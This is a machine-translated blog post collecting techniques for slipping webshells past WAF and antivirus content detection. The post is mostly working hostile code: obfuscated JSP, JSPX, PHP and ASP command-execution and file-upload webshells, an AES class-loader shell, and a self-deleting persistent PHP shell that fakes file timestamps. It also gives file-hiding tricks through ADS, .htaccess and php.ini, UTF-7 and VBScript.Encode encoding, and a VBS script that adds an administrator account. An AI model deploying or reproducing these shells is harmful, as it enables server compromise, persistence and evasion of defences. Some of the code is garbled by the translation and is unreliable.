当前位置:网站首页>Content bypass sharing
Content bypass sharing
2022-07-28 01:40:00 【goddemon】
Typical common interception situations
① direct reset
② It can be uploaded successfully but blocked url page
That is, there is no such page online when you visit 
Content bypass Ideas
I understand waf Content detection principle :
waf The principle of detection :
Dynamic detection –> Detection process and request and response Most bags
The static test –> Forced inspection ( When some parameters or contents are detected, they are directly reset fall ) Or weak detection ( That is, some of them are sensitive and are being tested )
What we need to do here is usually static detection
webshell Content free bypass
jsp Horse
① Basic knowledge points
Directly shell Use Godzilla or ice scorpion
Ice scorpion can't start resolvent
https://blog.csdn.net/RABCDXB/article/details/122250489?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-122250489-blog-119328054.pc_relevant_antiscanv2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-122250489-blog-119328054.pc_relevant_antiscanv2&utm_relevant_index=2
jsp The manner in which the order is executed
jsp Basic knowledge of labels
<%@ %> // Page instructions , Set page properties and feature information
<% %>//java code snippet , Cannot declare method
<%! %>//java Code declaration , Declare global variables or current page methods
<%= %>//java expression
If forced inspection <% out.println(i)%> and <%@ page%> A word
You can only consider going xml Format type horse or el Horse or unicode Conduct bypass
② common bypass Ideas for improvement
① Direct use of features bypass
1. utilize jsp Common features bypass Ideas –> The effect of personal test is not particularly good now Can be reduced to 2 The level cannot be reduced
unicode Transcoding parsing feature + Line feed feature + Annotator properties +base64 characteristic + Code obfuscation
Common code obfuscation
ASCII
String a=new String(new byte[]{
121,122,100,100,77,114,54});
System.out.println("ASCII:"+a);
HEX
import javax.xml.bind.DatatypeConverter;
String b=new String(DatatypeConverter.parseHexBindary("797a64644d7236"));
System.out.println("HEX:"+b);
BASE64
import sum.misc.BASE64Deconder;
String c=new String(new BASE64Decode().decodeBuffer("eXpkZE1yNG=="));
System.out.println("BASE64:"+c);
//① Splicing features are about to out and println The method of splicing together to make the request
<%out.%><% println("hello"); %>
//② Line feed feature
// For example, some ideas about demoting ice scorpion horses
// Directly from 6 Downgrade to 2 The magnitude of Baidu is a direct way to avoid killing
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*,sun.misc.BASE64Decoder"%>
<%!class U extends ClassLoader
{
U(ClassLoader c){
super(c);
}
public Class g(byte []b)
{
return super.defineClass(b,0,b.length);
}
}%>
<%if (request.getMethod().equals("POST"))
{
String k="e45e329feb5d925b";
session.putValue("u",k);
Cipher c=Cipher.
getInstance("AES");
c.init(2,
new SecretKeySpec
(k.getBytes()
,"AES"));
BASE64Decoder encode
=new sun.misc .BASE64Decoder();
String requestString = request.getReader().readLine();
new U(this.getClass()
.getClassLoader()).
g(c.doFinal(encode.
decodeBuffer(requestString))).newInstance().equals(pageContext);
}%>
//③ The annotator feature is to use annotators to confuse
// \u000d a="world";
// \u000a a="hello world!";
\u000d as well as \u000a It's exactly the same as “\r” enter 、“\n” Line break
// That is, the above code is equivalent to the idea of the following code
public void testUnicode() {
String a = "Hello";
// \u000d a="world";
System.out.println(a);
// \u000a a="hello world!";
System.out.println(a);
}
public void testUnicode() {
String a = "Hello";
//
a="world";
System.out.println(a);
//
a="hello world!";
System.out.println(a);
}
//④base64 characteristic
java YQ==Yg== ————》ab
php YQ==Yg== ————》 The statement
The feature is that it can be spliced :
a(base64)+b(base6)=ab
utilize unicode Conduct bypass
But now this d Dun's killing was a little tragic
https://tool.leavesongs.com/
Characteristics :
//JSP Support Unicode Transcoding and line feed
//Unicode The format is \u0053, And support \uuuuuuuuuuuuuuu0053, That is, no matter how many you add u Fine , And does not support large U, Only small u
// Such as xyz It can be expressed as
x\u0079\u007a
\u0078y\u007a
\u0078\u0079z
\u0078\u0079\u007A
\u0078\uuuu0079\uuu007a
\uuuuu0078\uu0079z
\uuuuuuuuu0078yz
<% \u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0031\u0032\u0033\u0029\u003b %> that will do 
Source of ideas
https://www.cnblogs.com/piaomiaohongchen/p/13963476.html
Code to bypass
https://blog.csdn.net/weixin_39933438/article/details/111049491
2.jspx Characteristics of :
//①xml Syntax supports entity coding
Process child = Runtime.getRuntime().exec(cmd);
//②cdata characteristic
// stay XML Element ,< and & It's illegal. , encounter < The parser will interpret this character as the beginning of the new element , encounter & The parser will interpret the character as the beginning of the character materialization encoding . But sometimes we need to be in jspx Add in js The code uses a lot of < and & character , Therefore, the script code can be defined as CDATA.
//CDATA Part of the content will be ignored by the parser .
// Format :<![CDATA[xxxxxxxxxxxxxxxxxxx]]>
// That is to say <![CDATA[xxxxxxxxxxxxxxxxxxx]]> The content in this will be ignored So you can use these to take around
Such as
String cmd = request.getPar<![CDATA[ameter]]>("shell");
3. Other tips
https://www.jianshu.com/p/c0c566de4e97 Reference material
- jsp Don't use <% %> Tag how to execute commands
- jspx Don't use jsp:scriptlet </jsp:scriptlet> How to execute commands
// Ideas jsp Bypass method use el Expressions bypass
//el Common usage
https://www.jb51.net/article/105314.htm
<html>
<body>
${
Runtime.getRuntime().exec(pageContext.request.getParameter("cmd"))}
</body>
</html>
?cmd=calc // You can play the calculator to prove
//java turn el Ideas
//scriptengine
//${''.getClass().forName(param.aef).newInstance().getEngineByName("javascript").eval(param.aef1)}
<html>
<body>
aef1=try{
load("nashorn:mozilla_compat.js");}catch (e){
}importPackage(Packages.java.util);importPackage(Packages.java.lang);importPackage(Packages.java.io);s=[2];s[0]='cmd';s[1]='/c whoami /all';a="";b=java.lang.Runtime.getRuntime().exec(s).getInputStream();output+=+new BufferedReader(new+InputStreamReader(b));while ((line=output.readLine()) != null) {
a=a%2Bline%2B"\n"};a
</body>
</html>
//jspx Bypassing ideas 1
// Use the command space to rename to bypass
// principle : stay <jsp:scriptlet> In this label ,jsp Is the default namespace , But in fact, you can replace it with other names at will
<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
<bbb:scriptlet>
Runtime.getRuntime().exec(pageContext.request.getParameter("cmd"));
</bbb:scriptlet>
</bbb:root>
//jspx Bypassing ideas 2
utilize <jsp:expression> Bypass
That is, write the expression to jspx You can bypass
<jsp:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
<jsp:expression>
Runtime.getRuntime().exec(pageContext.request.getParameter("cmd"));
</jsp:expression>
</jsp:root>
jsp Coding features There is also a coding feature to kill common util Upload type No relevant articles found There is a chance to have a look behind
xml Format
#python2
charset = "utf-8"
data = '''<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
version="1.2">
<jsp:directive.page contentType="text/html"/>
<jsp:declaration>
</jsp:declaration>
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
<jsp:text>
</jsp:text>
</jsp:root>'''.format(charset=charset)
f16be = open('utf-16be.jspx','wb')
f16be.write(data.replace('UTF-8','UTF-16be').encode('utf-16be'))
f16le = open('utf-16le.jspx','wb')
f16le.write(data.replace('UTF-8','UTF-16le').encode('utf-16le'))
fcp037 = open('cp037.jspx','wb')
fcp037.write(data.replace('UTF-8','CP037').encode('cp037'))
ordinary jsp Format
bypass Ideas But I don't understand how this thing works
#python2
charset = "utf-8"
data = '''<%Runtime.getRuntime().exec(request.getParameter("i"));%>'''.format(charset=charset)
f16be = open('utf-16be.jsp','wb')
f16be.write('<%@ page contentType="charset=utf-16be" %>')
f16be.write(data.encode('utf-16be'))
f16le = open('utf-16le.jsp','wb')
f16le.write('<jsp:directive.page contentType="charset=utf-16le"/>')
f16le.write(data.encode('utf-16le'))
fcp037 = open('cp037.jsp','wb')
fcp037.write(data.encode('cp037'))
fcp037.write('<%@ page contentType="charset=cp037"/>')
② Code layer or confusion layer bypass Ideas
Two articles from Alibaba Security Response Center
http://www.52bug.cn/hkjs/6570.html
https://mp.weixin.qq.com/s/YhiOHWnqXVqvLNH7XSxC9w
1. Code level bypass
Call idea
Call directly
java.lang.Runtime
<% if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in=Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a=-1;
byte[] b=new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
utilize java.lang.ProcessBuilder The idea of implementation 
Here we use typical methods bypass The most common is reflection calls + Class loading bypass
Reflection call ( stay bypass webshell In this way More )
It is common to change the code into reflection for execution 
reason : Two
① Confusion code can be added to reflection
②java It also uses this idea to change the implementation process
The simplest way to use reflection is to avoid killing
// The first feature --> Reflection calling method
//Runtime rt = Runtime.getRuntime();
//String cmd = request.getParameter("cmd");
//Process process = rt.exec(cmd);
<%@ page language="java" pageEncoding="UTF-8" %>
<%
// Add a password
String PASSWORD = "password";
String passwd = request.getParameter("pwd");
String cmd = request.getParameter("cmd");
if (!passwd.equals(PASSWORD)) {
return;
}
// Reflection call --> Thinking of reflection
Class rt = Class.forName("java.lang.Runtime");
java.lang.reflect.Method gr = rt.getMethod("getRuntime");
java.lang.reflect.Method ex = rt.getMethod("exec", String.class);
Process process = (Process) ex.invoke(gr.invoke(null), cmd);
// Echo similar to the above
java.io.InputStream in = process.getInputStream();
out.print("<pre>");
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine()) != null) {
out.println(s);
}
out.print("</pre>");
%>
③ Special horse
Upload horse
<%@ page import="java.util.*,java.io.*" pageEncoding="UTF-8" contentType="text/html; charset=utf-8"%>
<%
request.setCharacterEncoding("utf-8");
String filePath = request.getParameter("filePath");
String content = request.getParameter("content");
String base64Flag = request.getParameter("base64");
String msg = "";
if(content != null){
try{
File file = new File(filePath);
OutputStream os = new FileOutputStream(file);
byte[] bytes = null;
if("on".equals(base64Flag)){
bytes = new sun.misc.BASE64Decoder().decodeBuffer(content);
}else{
bytes = content.getBytes("utf-8");
}
os.write(bytes);
os.close();
msg = "success";
}catch(Exception e){
msg = "error";
}
}
%>
<html>
<head>
</head>
<body>
<font color="red"><%=msg%></font>
<form action="" method="post">
<table>
<tr>
<td> The path of this document is :</td>
<td><%=application.getRealPath("")%></td>
</tr>
<tr>
<td> Save the path :</td>
<td><input type="text" size="60" name="filePath"/><input type="checkbox" name="base64"/>base64 Decode and save </td>
</tr>
<tr valign="top">
<td> Malaysian content :</td>
<td><textarea rows="20" cols="70" name="content"></textarea></td>
</tr>
<tr align="right">
<td> </td>
<td><input type="submit" value=" preservation "/></td>
</tr>
</table>
</form>
</body>
</html>
-----------------------------------
jsp utilize base64 Decode and upload binary files
https://blog.51cto.com/0x007/1204440
Change horses
<%
// Write the file to the current directory With the current jsp Same as catalog
String a=application.getRealPath(request.getServletPath())+"2.txt";
// At present jsp The full path xx/xx.jsp2.txt
out.println(a);
String b=new String(new
sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c"))); //base64 Content
new java.io./**/FileOutputStream(a).write(b.getBytes());
%>
php Horse
Basic knowledge points
①assert and eval difference
eval It's a constructor, not a function , Cannot be called by variable functions
assert It's a function Can be called by variable functions
② Functions are commonly used
Deformation function –> Use the deformation function to deform assert function Such as reverse
ucwords() // Function converts the first character of each word in a string to uppercase .
ucfirst() // Function to convert the first character in a string to uppercase .
trim() // Function to remove white space and other predefined characters from both ends of a string .
substr_replace() // Function to replace part of a string with another string
substr() // Function returns part of a string .
strtr() // Function to convert a specific character in a string .
strtoupper() // Function to convert a string to uppercase .
strtolower() // Function to convert a string to lowercase .
strtok() // Function splits a string into smaller strings
str_rot13() // Function on a string ROT13 code .
Callback function –> Use callback function to splice horse A typical array_map Use
call_user_func_array()
call_user_func()
array_filter()
array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
Common string operation functions
ucwords() // Convert the first character of each word to uppercase
ucfirst() // Convert first character to uppercase
trim() // Remove the characters on both sides of the string
substr_replace() // Function to replace part of a string with another string
substr() // Function returns part of a string
strtr() // Function to convert a specific character in a string
strtoupper() // Convert all characters to uppercase
strtolower() // Convert all characters to lowercase
strtok() // Function splits a string into smaller strings
str_rot13() // Function on a string ROT13 code
chr() // From specified ASCII Value returns the character
hex2bin() // Convert hexadecimal values to ASCII character
bin2hex() //ASCII Character string converted to hexadecimal value
gzcompress()、gzdeflate()、gzencode() // String compression
gzuncompress()、gzinflate()、gzdecode() // String decompression
base64_encode() //base64 code
base64_decode() //nase64 decode
pack() // Data is loaded into a binary string
unpack() // Unpacking data from binary strings
// Compressed function
<?php
$a = gzcompress("abc");
echo " After the compression : ".$a;
echo "<br> After decompressing : ".gzuncompress($a);
?>
<?php
$func = gzuncompress(base64_decode($_GET["func"]));
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($func);
?>
//② Self encryption and decryption
<?php
// The string to encrypt
$data = 'demo';
// secret key
$key = '123456';
// Encrypt data 'AES-128-ECB' Can pass openssl_get_cipher_methods() obtain
$encrypt = openssl_encrypt($data, 'AES-128-ECB', $key, 0);
echo " After encryption : ".$encrypt;
// secret key
$key = '123456';
// Decrypt data
$decrypt = openssl_decrypt($encrypt, 'AES-128-ECB', $key, 0);
echo "<br> After decryption : ".$decrypt;
Practical use
<?php
$key = "password";
$fun = openssl_decrypt($_GET['func'], 'AES-128-ECB', $key, 0);
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);
//③ XOR encryption
<?php
$key = "password";
//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);
③ Attack principle idea
General idea :
1. The coding idea is to directly use base64_decode() Coding idea generation
2. XOR featureless thought construction
Such as assert XOR avoids killing a sentence or char character
<? @("Y;HJ(Z"^"8H;/Z.")(${
"~?}$"^"!x8p"}[1]);
# Such as the following is
// principle $t="base64_"."decode"; That is, at the beginning
$t='{
{
{
{
{
{
{
{
{
{
{
{
{'^chr(25).chr(26).chr(8).chr(30).chr(77).chr(79).chr(36).chr(31).chr(30).chr(24).chr(20).chr(31).chr(30);
Custom variable ideas –> namely post[1] These ideas
#① Typical technique
After cutting, wrap around the connection
#② From other functions or define Variable operation to get
#③ After multiple regular matching and replacement, connect
Custom function
①assert Function is the idea above Callback function or deformation function around --> The most typical method
# There are many thieves in this way , Such as this method
<?php
/* 97 = a 65 = A 115 = s 83 = S 101 = e 69 = E 114 = r 82 = R 116 = t 84 = T */
$a = chr(65).chr(83).chr(83);//ASS
$b = chr(69).chr(82).chr(84);//ERT
$c = strtolower($a.$b);//assert
$aa = array($_GET['x']);
array_map($D = $c,$DD = $aa );
//strtolower(): This function converts all characters of the string parameter passed in to lowercase , And put the word back in the form of small definite
//strtoupper(): This function is the same as strtolower The function is the opposite , Is to convert all the characters of the incoming character parameters into large
?>
② about eval Function wrapping
# This can only be done with the idea of special call chain
If you put eval() Functions are written in other functions or functions of classes to bypass --> Methods of typical constructors and magic functions
Typical is const Dynamic references and dynamic chain calls of classes
Confuse ideas : That is, some methods of disturbing characteristics
#① Introduce classes or functions to do some normal operations to confuse the code
#③ Introduce normal code to confuse such practices
public $x="";
public $y="";
#② Introduce special characters to interfere --> Such as
Y---W|@^^!@#$%^&* Me me |E=)))(((————》aa
# principle :Php Some special symbols will be ignored , And can be successfully transformed into what you want base64 character string
<?php
$c="NULL";
$s=
substr ("aabbccsystem".null,"0x6");
null.$s/*0*/(null.
$_GET/**/
['cmd'/*1*/]/*2*/);
?>
<?php
$zeo='1';
$$zeo=$_POST['x'];
eval(NULL.``.$1);
?>
Special skills
① Version differences surround
php 5.2 The following versions can be parsed
<?php
\echo `whoami`;?>
#②16 Base string
# principle : stay php7 It is not considered a number in ,php5 Is still a number
# After testing 5.3 and 5.5 The command can be executed successfully ,5.2 and php7 Unable to execute
<?php
$s=substr("aabbccsystem","0x6");
$s($_GET['cmd']);
?>
#③list Value in positive direction
<?php
$info=array("dir","whoami");
list($a[0],$a[1])=$info;
SYSTEM(END($a))
?>
php 5 Output perform dir
php 7 Output perform whoami
#④AF Around the 7.3.4 Command execution , Other versions echo You must return to the next line
<?=
$a=<<< aa
assasssasssasssasssasssasssasssasssasssasssassss
aa;echo `whoami`
?>
##⑤ Get external parameters
# Get the content according to the version characteristics
<?php
$arr = get_defined_functions()['internal'];
//var_dump($arr);
$arr[457]($_GET['cmd']);
② Other tips
# Scientific enumeration
<?php
$arr[0]='1';
$arr[99999e9999999]=$_GET[1];
@eval("".$arr[0]."");
echo $arr[0];
echo $arr[99999e9999999];
# Analyzable is 999e99999=0 Therefore, we can use this kind of thinking to bypass
XOR characteristic
git clone https://github.com/devploit/XORpasscd XORpass
$ python3 xorpass.py -h
<?php
$arr = get_defined_functions()['internal'];
//var_dump($arr);
$arr[457]($_GET['cmd']);
1.) Typical horse content
①php Five prefixes
Five prefixes
<?php phpinfo();?>
<script language='php'>phpinfo();</script>
<?=phpinfo()?>
<?phpinfo()?>
<%=phpinfo()%>
② In a word
<?php @eval($_POST['hacker']); ?>
<?php assert($_REQUEST["pass"]);?> Ant sword connection needs coding ,Cknife No coding
<?php echo `$_=$_REQUEST[baby]`; ?>
<?php
$b=1;$a=$_POST;extract($a);print_r(`$b`);?>
③ The shortest sentence
<?=`$_GET[1]`;
④ The undead horse
<?php
set_time_limit(0); // Set script execution time ,0 For no time limit
ignore_user_abort(1); // Disconnecting from the client does not terminate the execution of the script
unlink(__FILE__); // Then delete the file itself
$file = '/var/www/html/.shell.php';
//$file = 'D:\phpstudy_pro\WWW\h\.shell.php';
$code = '<?php @eval($_POST['pwd']);?>';
while (1) {
file_put_contents($file, $code); // Write shell file
system('touch -m -d "2020-10-19 13:50:11" .shell.php'); // modifying timestamps
usleep(1000); // Delay the execution of the program by the specified number of microseconds
}
?>
2.) Characteristic understanding
① The difference between single quotation marks and double quotation marks
<?php
$a = '123';
$b = '$a';
$c = "$a";
echo $b;
echo '<br>';
echo $c;
?>
Output Single quotation marks are not used as variable names, but as direct characters Double quotation marks directly as variable names
$a
123
② Common winding characteristics
In fact, the essence of personal understanding : By confusing the operation of the code
Common are
1. Encapsulate the execution code into a function or class for execution, that is, the following three variable variables , Variable function
2. Encryption and decryption execution
1、 Volatile variables
<?php
$b = "assert";
$a = 'b';
$$a($_POST['hacker']);
?>
2、 Variable function
@$_GET['a']($_GET['cmd']);
http://127.0.0.1/1.php?a=system&cmd=whoami
3、 Self writing function
<?php
function test($a){
$a($_POST['x']);
}
test(assert);
?>
ucwords() // Function converts the first character of each word in a string to uppercase
ucfirst() // Function to convert the first character in a string to uppercase
trim() // Function to remove white space and other predefined characters from both ends of a string
substr_replace() // Function to replace part of a string with another string
substr() // Function returns part of a string
strtr() // Function to convert a specific character in a string
strtoupper() // Function to convert a string to uppercase
strtolower() // Function to convert a string to lowercase
strtok() // Function splits a string into smaller strings
str_rot13() // Function on a string ROT13 code
explode // Scatter the string into an array
3.) Former bypass tips
Hippos can cross now
<?php
$a=end($_REQUEST);
eval($a);
?>
## Principle analysis :
#①ReflectionClass Create a user class
#② call getDocComment Built in functions to get comments
#③ And then use it substr To intercept the content of the value for processing
#④ In use eval Execution can be
<?php
/** * assert($_GET[1+0]); */
class User {
}
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
assert($d);
?>
#php All connection passwords are 1
#?1=phpinfo();
# principle : When materializing, the value will be automatically base64 decode That is, from the perspective of decoding to analyze the bypass bypass
<?php
class people{
public $name;
public $age;
public function __construct($name){
$this->name=base64_decode($name);
}
}
foreach ($_REQUEST as $key => $value) {
$$key=$value;
};
$stu=new people('YXNzZXJ0');
$stu1=$stu->name;
$stu1($key);
?>
# Usage method
#http://127.0.0.1/2.php?key=phpinfo();
Previous dynamic chain ideas
<?php
class Test{
public static function a(){
$a = base64_decode/*/\*/($_POST/*\*/['a']);
return $a;
}
}
$func = 'a';
$classname = 'Test';
$a =$classname::$func();
eval/*\/*/($a);
?>
## Still... Now bypass d Shield
<?php
class test{
const name='eval(end($_REQUEST));';
}
eval(test::name);
?>
hide tips
1. hide php file
windows Next
atttrib +s +a +h +r shell.php # hide
atttrib -s -a -h -r shell.php # Show
2.ads hide
windows Data flow has a good way to hide data . From the command line
echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg
<?php include('shell.php:123.jpg');?>
3. utilize .htacess and .user.ini and php.ini
modify .htacess file
AppType application/x-httpd-php .jpg # Will put .jpg File as php Code runs .
php_value auto_append_file D:/123.txt # Automatically include files .
php_value auto_append_file .htaccess # Include yourself .
#<?php phpinfo();
php.ini
modify auto_prepend_file = shell.txt or auto_append_file= shell.txt
Revise include_path, It can be accessed through any page include_path = ".;D:\phpstudy\www\"
In the path D:\phpstudy\www\ writes webshell.txt
user.ini+ Upload jpg
auto_prepend_file = a.jpg
auto_append_file = a.jpg
asp Horse
build asp Environmental Science
Online building method ( Fast )
http://landian.cc/
asp Website pagoda building ideas
https://www.vpsss.net/26656.html
https://blog.csdn.net/weixin_46709219/article/details/111940519
add to ssl Certificate method
https://www.yuntue.com/post/27543.html
1. Basic knowledge points
asp In a word, Trojan horse basic knowledge points
asp Execute function :
Eval 、 Execute 、ExecuteGlobal
asp The annotator for :
' 、 REM Of course, if you use vbscript Notes also <!-- --> and //
asp Interpreter :
VBScript
perform eval and execute The difference between
eval Computes the value of an expression and returns the result
response.Write(eval("3+2")) ' Output 5
Execute Execute one or more specified statements . Use colons between multiple statements (:) separate
Execute "response.Write(""abc"")" " Output abc
asp Basic knowledge points
① Value
//dim Definition , You can define functions , Boolean , Numbers , plastic
Dim str: str="xxx"
dim str as sssss
Dim name,age
name="111"
age="18"
//set It's also an assignment , But usually for special data types
set conn=server.createobject("adodb.connection")
// Define an array
dim a(5)
// from get Value
request.querystring("name")
request()
request.item("c")
// from post Value
request.form("lname")
// from cookie
Request.Cookies("firstname")
DIM Generally used to declare variables , Such as :dim Variable name as data type
SET It is generally used to assign values to some special data types
② How to define a function
Function b():
response.write("xxxx")
End Function
b()
③ Creation
Class myclass
Private Sub Class_Initialize // Methods executed at the beginning of the class
response.write("xxxx")
End Sub
private sub class_terminate() // Class end method
response.write " Class is over <br>"
End sub
End Class
④ loop
<%
dim i
i=0
dim sum
sum=0
for i=1 to 10
sum=sum+i
response.write(sum&chr(10) )
next
%>
⑤ Create a component instance
Server.CreateObject("Scripting.FileSystemObject") // Call the file control component
Server.CreateObject("Scripting.Dictionary") // Call key value pair object
CreateObject("WScript.Shell") // call wscript Components , Use it to operate the registry , To execute an order, etc
The following code is directly put into 1.vbs Execution will eject the computer , stay Web The end will also pop up the calculator in the task manager , But I won't see it directly
dim oShell,cmd
Set oShell = CreateObject("WSCript.shell")
cmd="calc.exe"
call oShell.exec(cmd)
⑥ Common word processing functions
function describe
InStr Returns the first occurrence of a string in another string . The retrieval starts with the first character of the string .
InStrRev Returns the first occurrence of a string in another string . The retrieval starts with the last character of the string .
LCase Converts the specified string to lowercase .
Left Returns the specified number of characters from the left side of the string .
Len Returns the number of characters in a string .
LTrim Remove the space to the left of the string .
RTrim Remove the space to the right of the string .
Trim Remove the spaces to the left and right of the string .
Mid Returns a specified number of characters from a string .
Replace Replace the specified part of the string with another string for the specified number of times .
Right Returns a specified number of characters starting from the right side of a string .
Space Returns a string consisting of a specified number of spaces .
StrComp Compare two strings , Returns a value representing the result of the comparison .
String Returns a string containing repeated characters of a specified length .
StrReverse Reverse string .
UCase Converts the specified string to uppercase .
Common techniques
Array free
<%
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>
// Add some circulation
<%
dim array(1)
dim c
array(1)=request("404")
for each a in array
c = a & ""
next
execute(c)
%>
Functional approach
<%
Function b():
b = request("404")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
Encryption method
<%
eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600"))
function gw_jiemi(text)
const key="gw"
dim str : str=text
dim str1
dim str2 : str2=strreverse(str)
for i=1 to len(str2) step 4
str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))
next
gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))
end function
%>
annotator
<%
<!--
a = request("404")
execute(a)
-->
%>
Class approach
<%
Class LandGrey
private str_title
public property let setauthor(str)
execute(str&"")
end property
End Class
Set a= New LandGrey
a.setauthor= request("404")
%>
String manipulation
<%
a = request("404")
b = Left(a,99999)
execute(b)
%>
// toggle case
<%
a = request("404")
b = Left(UCase(a),99999)
execute(b)
%>
// Splice spaces This has already been g It fell off
<%
a = request("404")
b = Left(UCase(a)&"",99999)
execute(b)
%>
asp Typical characteristics of
① Supported tag engines <%@ language="Javascript" %> and <%@ language="vbs" %>// And sensitive to case
<%@ language="Javascript" %>
<%
Response.Write("Hello World!")
/*asdasasdasda d*/
%>
② The head can be changed into the following
ASP Code blocks in scripts are usually wrapped in <% %> In the label , Default to VBscript Explain with language . Quotation marks can be removed .
<script language="VBScript" runat="server">
xxxx
</script>
<script language=vbs runat=server>
xxx
</script>
<%@ language=vbs %>
<%@ language="VBscript" %>
<%@ LANGUAGE = VBScript.Encode %>
③ annotator
' Single quotation marks ( Single-line comments )
REM rem+ Space ( Single-line comments )
// Double diagonal ( Single-line comments ,VBscript,JScript You can use , Support only IIS)
<!-- --> HTML annotator ( Single-line comments ,VBscript You can use , Support only IIS)
/* */ Multiline annotators ( Multiline comment ,JScript You can use )
③ Newline segmentation feature
utilize _ Line break
Like this response.write("iceice")// That is, using the line feed feature, that is _ Can change lines
Response._
Write("iceice")
Response._
_
_
Write("iceice")
④ Splicing characteristics
principle : For strings wrapped in double quotation marks , It can support splicing , for example , also asp Support chr Type replaces all characters
Response.Write("Test"++++++"asdasdas"&"cccccccccccccccc"&""&chr(97))
// The final output is Testasdasdascccccccccccccccc
⑤eval Command execution asp Of
principle : call wscript.shell To execute an order , Be similar to php Inside system This one can bypass
// Reference material : About wscript.shell Inside run and exec The difference between
//https://www.cnblogs.com/swek/articles/4337999.html
<%
set stm=server.CreateObject("adodb.stream")
set oScript =CreateObject("WSCRIPT.SHELL")
dim file
file="C:\\ProgramData\\1.txt"
dim command
command=request("command")
call oScript.run("cmd.exe /c " & command&" > " & file, 0, True)
' Command execution
stm.Type=2
stm.mode=3
stm.charset="gbk"
'stm.charset="utf-8"
stm.open
stm.loadfromfile(file)
str=stm.readtext
stm.Close
Response.Write(str)
%>
⑥ Strange colon
// Most of the others will affect parsing It should be asp It is caused by low fault tolerance
: On behalf of another line .
It refers to the completion of the previous statement .
principle : stay asp in ::::: Add , It will not affect its parsing ; and :::ssssasdas:::: It will not affect parsing
eval Except for functions
//bypass Of
<%
:::::execute(request("cmd"))::::::::::xasdasdas::::::::::asdasdas::::::::x:
:::::adasdasd::
:::::adasdasd::response.write("asdsad"):::::adasdasd::
::::sss:adasdasd::now():::::adasdasd::
%>
⑦asp Coding characteristics of
https://blog.csdn.net/weixin_40133121/article/details/108595440
codepage=936 Simplified Chinese gbk
codepage=950 Traditional Chinese big5
codepage=437 The United States / Canadian English
codepage=932 Japanese
codepage=949 Korean
codepage=866 ru
codepage=65001 unicode uft-8
//asp Grammar support utf-7 code ,65000 For a given utf7- The encoding mode of
<%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("cmd")%>
//Utf-7 If you encounter +xx- And xx Not more than 2, Will become empty characters, so you can use this idea to bypass
<%@codepage=65000%>
<%e+ss-v+k-a+k-l r+k-e+ka-q+k-u+k-e+kd-s+ks-t("cmd")+xx-+xx-+xx-+x-%>
// So it can become
<%@@@@@@@@@@codepage=65000%>
<%
+AGUAdgBhAGw-(r+k-e+k-q+k-u+k-e+k-s+k-t("cmd"))
%>
//UTF-7 Codec tools
https://lark-assets-prod-aliyun.oss-cn-hangzhou.aliyuncs.com/yuque/0/2022/rar/1431765/1647787698646-132dfb49-3550-405f-ac19-a4e8896e2ae0.rar?OSSAccessKeyId=LTAI4GGhPJmQ4HWCmhDAn4F5&Expires=1652629805&Signature=8ZlAVqjVm4DtYkyMP5iW%2Fh3%2FOMY%3D&response-content-disposition=attachment%3Bfilename*%3DUTF-8%27%27_UTF-7%2520%25E7%25BC%2596%25E7%25A0%2581%25E8%25A7%25A3%25E7%25A0%2581%25E5%25B7%25A5%25E5%2585%25B7.rar
SCRENC Tools
//screnc It is a native encryption tool from Microsoft , But when I found the tool to use , I can't use it anyway .
//http://bcn.bathome.net/s/tool/index.html?key=screnc
MsgBox 123
Will become
#@~^CgAAAA==\ko$K6,F 2BgMAAA==^#[email protected]
// Use this kind of Webshell You need to add a header prefix
<script language="VBScript.Encode">
#@~^[email protected]#@&j1D
bwYc214W,J3x1W[roPbdP1WW^[email protected]#@&PQsAAA==^#~@</script>
//ASP Yes, if it is found in the file header declaration VBScript.Encode, At the same time, it is detected in the subsequent content #@~^ ..... ^#[email protected]
// Then automatically #@~^(..... Content )^#[email protected] Decrypt and interpret the ciphertext in
// String processing tools
// Confusing tools :https://github.com/sevagas/macro_pack
⑧wscript and cscript The difference between
Can be run directly on the client VBS Script , The difference is that a use frame pops up , One is printed out using the console
The former has a pop-up window The latter does not
common vbs Script
// Add user's
Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
